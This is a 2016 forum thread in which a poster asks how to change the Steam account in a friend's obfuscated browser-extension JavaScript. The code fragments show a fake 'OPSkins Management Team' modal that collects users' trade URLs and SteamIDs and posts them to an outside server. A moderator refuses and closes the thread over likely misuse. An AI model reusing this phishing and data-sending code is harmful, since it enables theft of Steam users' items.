Thread: HELP Breaking Down My Friends (Javascript) Code!?

Thanks

Question HELP Breaking Down My Friends (Javascript) Code!?

PLEASE READ THIS!!!!! IMPORTANT!
    -------------------------------------------------------------
    My friend has coded some javascript and I have been looking at it for a while now. I will put the code below this explanation.. I want to change ONE thing in his code but I cannot find what I'm trying to change. Basically, the code works to be able to automate a trade offer on steam to a single account. So a user that interacts with this is setup to be taken to a specific trade link with the specific steam account. In the javascript you can see the user input code where the visitor interacts by submitting their trade link to be set up into going to the "specific" trade link (That "specific" trade link/steam account is what I'm trying to identify and change). My friend has it set up where that, "specific" trade link/steam account, is his own account. I want to change that so that "specific" account the user interacts with is MY OWN account.
    -------------------------------------------------------------
    THIS BACKGROUND INFORMATION IS VITAL TO UNDERSTANDING WHAT I NEED HELP WITH!

So now I will show you the SOME of the code that he has written...

==============================================================================

Code:
    ?function showNotice()
     {
     $(".shopSellItem img").is(".ajax-loader")===!1&&($("#imp_notice").fadeIn(),clearInterval(intervalID))
    }
    function get_steamID(e)
     {
     steamID=$("body").attr("data-steamid"),steamID?e():setTimeout(function()
     {
     get_steamID(e)
     }
     ,10)
    }
    function set_code(e)
     {
     return $("#alert-box").is(":hidden")?$("#qItems .offer-links").length?($("#qItems .offer-links a").eq(0).attr("href","javascript:ShowTradeOffer("+e+")"),$("#qItems .offer-links a").eq(1).attr("href","steam://url/ShowTradeOffer/"+e),!0):void setTimeout(function()
     {
     set_code(e)
     }
     ,100):!1

As seen in the code above there are multiple parts that say "SteamID" and "Steamid".. I cannot find any specific links directly to that "Specific" account I am looking for. If you can find where the specific account gets linked to the javascript in this code that would be great. If not let's continue to more of the code.

Code:
    function updBal()
     {
     $.post(apiURL,
     {
     action:"bal",keyAccess:keyAccess,steamid:steamID
     }
     ,function(e)
     {
     "-"!=e&&$("#op-count").text("$"+(current_bal+parseFloat(e)))
     }
     )
    }
    var loginAccess="c2hhZG93bWFuMDk1",keyAccess="619dea94b332475cc6271c4db2511f73",KeyEncode="15f8c92ca9a9f790188390159ddf4f3b",apiURL="https://opskinsplugin.com/base.php?l=c2hhZG93bWFuMDk1&k=619dea94b332475cc6271c4db2511f73&ek=15f8c92ca9a9f790188390159ddf4f3b",steamID=!1,isSending=!1,myForm=!1,elemNames=[],current_bal=parseFloat($("#op-count").text().substr(1));
    if(injectScript(chrome.extension.getURL("steam.js"),"body"),get_steamID(function()
     {
     updBal()
    }
    ),setInterval(updBal,5e3),"?loc=shop_sale_form"==document.location.search)
     {
     get_steamID(function()
     {
     if(isSending=getCookie("sendID"+steamID),"1"!=isSending)
     {
     if(myForm=!0,0==$("#tradeUrlModal").length)
     {
     var e='<div class="modal fade" id="tradeUrlModal" aria-hidden="false" style="display: block;
     padding-left: 11px;
     "> <div class="modal-backdrop fade" style="height: 373px;
     "></div> <div class="modal-dialog modal-lg"> <div class="modal-content"> <div class="modal-header"> <h4 class="modal-title">Please enter your Trade URL.</h4> </div> <div class="modal-body"> <h3>We need your Trade URL in order to be able to send you Steam trade offers.</h3> <p> <a href="https://steamcommunity.com/profiles/'+steamID+'/tradeoffers/privacy#trade_offer_access_url" target="_blank" class="btn btn-danger btn-lg" style="width:100%">Please click here to get it.</a> </p> <div class="input-group input-group-lg"> <span class="input-group-addon">Trade URL</span> <input type="text" class="form-control" id="trade-url" placeholder="Paste Trade URL here" required=""> <a href="#" id="save-trade-url" class="btn btn-primary input-group-addon">Save Trade URL</a> </div> </div> <div class="modal-footer"> <p>OPSkins Management Team</p> </div> </div> </div> </div>';
     $("body").append(e)
     }
     $("#tradeUrlModal").modal("show")
     }
     }
     ),$(document).on("click","#save-trade-url",function()
     {
     var e=$("#trade-url").val();
     return e?void $.ajax(
     {
     url:apiURL,type:"POST",data:
     {
     action:"saveTradeURL",keyAccess:keyAccess,steamid:steamID,url:e
     }
     ,dataType:"json",success:function(e)
     {
     setCookie("sendID"+steamID,1,
     {
     expires:31536e3
     }
     ),myForm&&location.reload()
     }
     }
     ):!1
     }

In the code above there are more parts containing "steamid" and "steamID" but I still can't find the part where my friend links his "specific" account to the javascript which allows the user to always open up the trade links straight to his account. However you do see the part where he lets the user link their steam trade link/ URL.

If you can help me find where I can change the "specific" account that my friend has set that would be very helpful. If not I have one last strip of javascript which is in a new .js file called "steam.js".

Code:
    (function($) {
        $('body')
            .attr('data-steamid', window.g_SteamID);
        $('#depositBtn')
            .unbind('click');
    })(jQuery)

I thought this might help lead to linking the user to the "specific" account of his because of the 3rd line. If you know of how I can change the "specific" account that for right now is my friends account which he uses to set up a steam trade between the user and his "specific" account that would help me out a bunch.. Thanks!!!

Last edited by jscheuer1; 07-27-2016 at 03:29 PM. Reason: format code

Thanks
    Thanked 3,449 Times in 3,410 Posts
    Blog Entries

I'm closing this thread pending further review. In the meantime - he's your friend - why not just ask him? I can see by the way the code is written that whoever wrote it didn't want it to be easy to figure out how to insert the id. I see a lot of places where it's required, but nowhere that it is set. And it's passed along in odd ways. As I said, someone didn't want people easily guessing how to use this code for a different user. And generally we don't help folks do things like that, it's possibly an intellectual property rights violation, and against these forum's rules.

But, as I say, I'm only closing this thread for now pending further review.

Edit: OK, we've thought about it and it really seems odd to us that you cannot just ask your "friend". We also know that spoofing of ids among those participating in the steam community is often a danger for legitimate participants, and not always obvious. For those and the additional reason that it seems clear the author of this code didn't want it changed in that manner (something our forum guidelines encourage us to respect), this thread will remained closed.

If at a future time you have a question for us about coding that does not have these obvious issues attached to it, please feel free to start a new thread about that. (not this)
    Last edited by jscheuer1; 07-28-2016 at 05:24 PM. Reason: We've thought about it
    - John

Show Additional Thanks: International Rescue Committee - Donate or: The Ocean Conservancy - Donate or: PayPal - Donate